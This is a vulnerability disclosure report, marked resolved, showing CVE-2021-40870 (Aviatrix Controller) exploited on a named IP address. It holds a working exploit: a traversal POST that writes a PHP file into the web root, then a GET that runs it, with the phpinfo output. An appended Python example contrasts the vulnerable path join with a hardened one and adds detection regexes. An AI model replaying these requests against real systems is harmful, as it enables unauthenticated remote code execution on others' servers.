CVE-2021-40870 on [52.204.160.31]
Critical
Elastic
Reported by
fdeleite
Vulnerability Details
Technical details and impact analysis
An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
The IP presents an SSL certificate issued to Elasticsearch:
``curl -kv https://52.204.160.31``
Output:
```
Server certificate:
* subject: C=US; ST=California; L=Mountain View; O=Elasticsearch, Inc.; CN=*.elasticit.co
```
## Steps To Reproduce
First, run this request:
```
POST /v1/backend1 HTTP/1.1
Host: 52.204.160.31
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php&data=RCE<?php phpinfo()?>
```
Then retrieve the content of the file ``1yv4QQmkj4h4OdmmyT11tkiGf5M.php``:
```
GET /v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php HTTP/1.1
Host: 52.204.160.31
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
```
The response body is the output of the phpinfo function. Response (truncated):
```
tr class="h"><th>Variable</th><th>Value</th></tr>
<tr><td class="e">SCRIPT_URL </td><td class="v">/v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php </td></tr>
<tr><td class="e">SCRIPT_URI </td><td class="v">https://52.204.160.31:8443/v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php </td></tr>
<tr><td class="e">HTTPS </td><td class="v">on </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_C </td><td class="v">US </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_ST </td><td class="v">California </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_L </td><td class="v">Mountain View </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_O </td><td class="v">Elasticsearch, Inc. </td></tr>
<tr><td class="e">SSL_SERVER_S_DN_CN </td><td class="v">*.elasticit.co </td></tr>
<tr><td class="e">SSL_SERVER_I_DN_C </td><td class="v">US </td></tr>
<tr><td class="e">SSL_SERVER_I_DN_O </td><td class="v">DigiCert Inc </td></tr>
<tr><td class="e">SSL_SERVER_I_DN_CN </td><td class="v">DigiCert SHA2 Secure Server CA </td></tr>
<tr><td class="e">SSL_SERVER_SAN_DNS_0 </td><td class="v">*.elasticit.co </td></tr>
<tr><td class="e">SSL_SERVER_SAN_DNS_1 </td><td class="v">elasticit.co </td></tr>
<tr><td class="e">SSL_VERSION_INTERFACE </td><td class="v">mod_ssl/2.4.39 </td></tr>
<tr><td class="e">SSL_VERSION_LIBRARY </td><td class="v">OpenSSL/1.1.1b </td></tr>
<tr><td class="e">SSL_PROTOCOL </td><td class="v">TLSv1.2 </td></tr>
<tr><td class="e">SSL_SECURE_RENEG </td><td class="v">true </td></tr>
<tr><td class="e">SSL_COMPRESS_METHOD </td><td class="v">NULL </td></tr>
<tr><td class="e">SSL_CIPHER </td><td class="v">ECDHE-RSA-AES128-GCM-SHA256 </td></tr>
<tr><td class="e">SSL_CIPHER_EXPORT </td><td class="v">false </td></tr>
<tr><td class="e">SSL_CIPHER_USEKEYSIZE </td><td class="v">128 </td></tr>
<tr><td class="e">SSL_CIPHER_ALGKEYSIZE </td><td class="v">128 </td></tr>
<tr><td class="e">SSL_CLIENT_VERIFY </td><td class="v">NONE </td></tr>
<tr><td class="e">SSL_SERVER_M_VERSION </td><td class="v">3 </td></tr>
<tr><td class="e">SSL_SERVER_M_SERIAL </td><td class="v">093CE89EF93EE5F18D1E07099ACC5AF9 </td></tr>
<tr><td class="e">SSL_SERVER_V_START </td><td class="v">Mar 20 00:00:00 2020 GMT </td></tr>
<tr><td class="e">SSL_SERVER_V_END </td><td class="v">Mar 25 12:00:00 2022 GMT </td></tr>
<tr><td class="e">SSL_SERVER_S_DN </td><td class="v">CN=*.elasticit.co,O=Elasticsearch\, Inc.,L=Mountain View,ST=California,C=US </td></tr>
<tr><td class="e">SSL_SERVER_I_DN </td><td class="v">CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US </td></tr>
<tr><td class="e">SSL_SERVER_A_KEY </td><td class="v">rsaEncryption </td></tr>
<tr><td class="e">SSL_SERVER_A_SIG </td><td class="v">sha256WithRSAEncryption </td></tr>
<tr><td class="e">SSL_SESSION_ID </td><td class="v">9cf6b4b42df9e371982120b49d57f9112c19df3722fb87d15cc592f73e1fa406 </td></tr>
<tr><td class="e">SSL_SESSION_RESUMED </td><td class="v">Initial </td></tr>
<tr><td class="e">HTTP_HOST </td><td class="v">52.204.160.31 </td></tr>
<tr><td class="e">HTTP_USER_AGENT </td><td class="v">Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 </td></tr>
<tr><td class="e">HTTP_CONNECTION </td><td class="v">close </td></tr>
```
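The request above works because a user-controlled name is joined into a server-side directory without a containment check, and because the resulting file lands where the web server will execute it. The following is an added example, not code from the report or from Aviatrix (the vendor's actual fix is not on this page): it models the vulnerable join beside a hardened version, and adds a detection rule that a WAF or log pipeline could run over POST bodies. The parameter names come from the request in the report; the storage directory `DATA_DIR`, the `.json` suffix and the sample body are assumptions or constructed for the example.

```python
import posixpath
import re
from urllib.parse import parse_qs

# Assumed storage directory for metric selections (hypothetical, not Aviatrix's).
DATA_DIR = "/var/lib/app/metrics"
# Allowlist for account_name: no '/', no '.', so no traversal and no extension control.
ACCOUNT_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

# Constructed sample body, taken from the request shown in the report.
SAMPLE_BODY = (
    "CID=x&action=set_metric_gw_selections"
    "&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php"
    "&data=RCE<?php phpinfo()?>"
)
SAMPLE_ACCOUNT_NAME = parse_qs(SAMPLE_BODY)["account_name"][0]


def unsafe_target_path(account_name: str) -> str:
    """Vulnerable pattern: join the name into DATA_DIR unchecked.

    Two things go wrong at once: posixpath.join discards DATA_DIR when the
    second component is absolute, and normpath collapses the leading '..'
    segments, so the caller ends up writing anywhere the process can.
    """
    return posixpath.normpath(posixpath.join(DATA_DIR, account_name))


def safe_target_path(account_name: str) -> str:
    """Hardened version: allowlist the name, fix the extension, prove containment."""
    if not ACCOUNT_NAME_RE.fullmatch(account_name):
        raise ValueError("invalid account_name")
    # The server, not the client, decides the suffix; metric data is never executable.
    target = posixpath.normpath(posixpath.join(DATA_DIR, account_name + ".json"))
    # Belt and braces: even if the regex is loosened later, the path must stay under DATA_DIR.
    if posixpath.commonpath([DATA_DIR, target]) != DATA_DIR:
        raise ValueError("path escapes data directory")
    return target


# Detection signatures for a WAF or request-log rule.
TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")
DANGEROUS_EXT = re.compile(r"\.(php\d?|phtml|phar|cgi|sh)$", re.IGNORECASE)


def flag_form_body(body: str) -> list:
    """Return (parameter, finding) pairs for a URL-encoded POST body."""
    findings = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            if TRAVERSAL.search(value):
                findings.append((name, "path traversal"))
            if DANGEROUS_EXT.search(value):
                findings.append((name, "executable file extension"))
            if "<?php" in value.lower():
                findings.append((name, "php tag in parameter value"))
    return findings


if __name__ == "__main__":
    print("unsafe join resolves to:", unsafe_target_path(SAMPLE_ACCOUNT_NAME))
    try:
        safe_target_path(SAMPLE_ACCOUNT_NAME)
    except ValueError as exc:
        print("hardened join rejects it:", exc)
    print("hardened join for a normal name:", safe_target_path("gw-east-1"))
    for param, finding in flag_form_body(SAMPLE_BODY):
        print(f"detection: {param}: {finding}")
```

Run with `python3 example.py`. The unsafe join shows the account name resolving straight to a path under the web root, the hardened version rejects the same input on the allowlist alone, and the detection rule fires three times on the sample body (traversal and `.php` in `account_name`, a PHP open tag in `data`). The containment check via `commonpath` is deliberately kept even though the regex already excludes `/` and `.`, so that a later relaxation of the allowlist does not silently reopen the traversal.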
## Impact
- An unauthenticated third-party attacker can execute arbitrary code remotely.
### Supporting Material/References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40870
Related CVEs
CVE-2021-40870
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Weakness
Code Injection